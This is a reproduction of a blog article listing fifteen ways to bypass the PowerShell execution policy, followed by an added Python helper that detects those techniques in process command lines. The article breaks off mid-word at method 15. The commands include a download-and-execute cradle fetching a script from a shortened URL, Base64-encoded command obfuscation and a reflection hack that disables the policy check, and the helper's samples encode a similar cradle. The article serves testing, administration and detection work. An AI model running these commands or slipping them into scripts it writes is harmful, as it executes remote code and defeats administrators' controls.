Bypass the PowerShell Execution Policy

15 Ways to Bypass the PowerShell Execution Policy

Author: Scott Sutherland

Original Article: NetSPI Blog

Introduction

By default, PowerShell is configured to prevent the execution of scripts on Windows systems. This can pose challenges for penetration testers, system administrators, and developers. However, there are multiple methods to bypass these restrictions without requiring local administrator rights.

1. Paste the Script into an Interactive PowerShell Console

Simply copy and paste your PowerShell script directly into an interactive console. This method doesn't require writing to disk or changing configurations.

2. Echo the Script and Pipe it to PowerShell Standard Input

Echo Write-Host "My voice is my passport, verify me." | PowerShell.exe -noprofile -

3. Read Script from a File and Pipe to PowerShell Standard Input

Get-Content .\runme.ps1 | PowerShell.exe -noprofile -
TYPE .\runme.ps1 | PowerShell.exe -noprofile -

4. Download Script from URL and Execute with Invoke Expression

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('https://bit.ly/1kEgbuH')"

5. Use the Command Switch

PowerShell -command "Write-Host 'My voice is my passport, verify me.'"

6. Use the EncodeCommand Switch

$command = "Write-Host 'My voice is my passport, verify me.'"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
powershell.exe -EncodedCommand $encodedCommand

7. Use the Invoke-Command Command

Invoke-Command -ScriptBlock {Write-Host "My voice is my passport, verify me."}

8. Use the Invoke-Expression Command

Get-Content .\runme.ps1 | Invoke-Expression

9. Use the “Bypass” Execution Policy Flag

PowerShell.exe -ExecutionPolicy Bypass -File .\runme.ps1

10. Use the “Unrestricted” Execution Policy Flag

PowerShell.exe -ExecutionPolicy UnRestricted -File .\runme.ps1

11. Use the “Remote-Signed” Execution Policy Flag

PowerShell.exe -ExecutionPolicy RemoteSigned -File .\runme.ps1

12. Disable ExecutionPolicy by Swapping out the AuthorizationManager

function Disable-ExecutionPolicy {
  # Use reflection to reach the private _context field of the current execution context
  $ctx = $executioncontext.GetType().GetField("_context", "nonpublic,instance").GetValue($executioncontext)
  # Replace its private _authorizationManager with a plain AuthorizationManager, which applies no execution policy
  $ctx.GetType().GetField("_authorizationManager", "nonpublic,instance").SetValue($ctx, (New-Object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell"))
}
Disable-ExecutionPolicy
.\runme.ps1

13. Set the ExecutionPolicy for the Process Scope

Set-ExecutionPolicy Bypass -Scope Process

14. Set the ExecutionPolicy for the CurrentUser Scope via Command

Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy UnRestricted

15. Set the ExecutionPolicy for the CurrentUser Scope via the Registry

Modify the registry key:

HKEY_CURRENT_USER\Softw
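From the defensive side, most of the methods above leave a recognisable process command line. The Python triage helper below is an added example, not code from the original article: it flags the execution-policy flags of methods 9 to 11, the -EncodedCommand form of method 6 (decoding the UTF-16LE payload and scanning it too), the download-and-invoke cradle of method 4 and a script piped on standard input as in methods 2 and 3. The sample command lines, the `example.invalid` URL and the function names `triage` and `decode_encoded_command` are constructed for this example, and the pattern set is illustrative rather than exhaustive.

```python
import base64
import re

# Patterns keyed to the bypass techniques listed on this page. powershell.exe
# accepts unambiguous prefixes of switch names, so "-ex", "-exec" and "-enc"
# must match as well as "-ExecutionPolicy" and "-EncodedCommand".
INDICATORS = {
    "execution-policy-override": re.compile(
        r"-e\w*\s+(?:bypass|unrestricted|remotesigned)\b", re.I),
    "encoded-command": re.compile(r"-e\w*\s+([A-Za-z0-9+/]{16,}={0,2})", re.I),
    "download-and-invoke": re.compile(r"downloadstring|invoke-expression|\biex\b", re.I),
    "script-from-stdin": re.compile(r"\s-\s*$"),  # trailing "-": script read from stdin
}
POWERSHELL = re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.I)


def decode_encoded_command(blob):
    """Decode an -EncodedCommand payload (Base64 over UTF-16LE text); None if malformed."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(cmdline):
    """Return {'indicators': [...], 'decoded': ...}; a decoded payload is scanned as well."""
    result = {"indicators": [], "decoded": None}
    if not POWERSHELL.search(cmdline):
        return result  # not a PowerShell process; nothing to check
    for name, pattern in INDICATORS.items():
        match = pattern.search(cmdline)
        if not match:
            continue
        result["indicators"].append(name)
        if name == "encoded-command":
            result["decoded"] = decode_encoded_command(match.group(1))
    decoded = result["decoded"] or ""  # bypass hidden inside the payload gets a "decoded:" prefix
    for name, pattern in INDICATORS.items():
        if name != "encoded-command" and pattern.search(decoded):
            result["indicators"].append("decoded:" + name)
    return result


# Constructed sample command lines, shaped like process-creation telemetry (not real data).
ENCODED = base64.b64encode(
    "iex (New-Object Net.WebClient).DownloadString('https://example.invalid/a.ps1')"
    .encode("utf-16-le")).decode()
SAMPLES = [
    r"PowerShell.exe -ExecutionPolicy Bypass -File .\runme.ps1",
    f"powershell.exe -nop -enc {ENCODED}",
    "PowerShell.exe -noprofile -",
    r"C:\Windows\notepad.exe C:\Users\alice\notes.txt",
]
```

Running `triage` over each entry of `SAMPLES` reports the matching technique names; method 1 (pasting into an interactive console) leaves no command-line trace and needs script block logging instead.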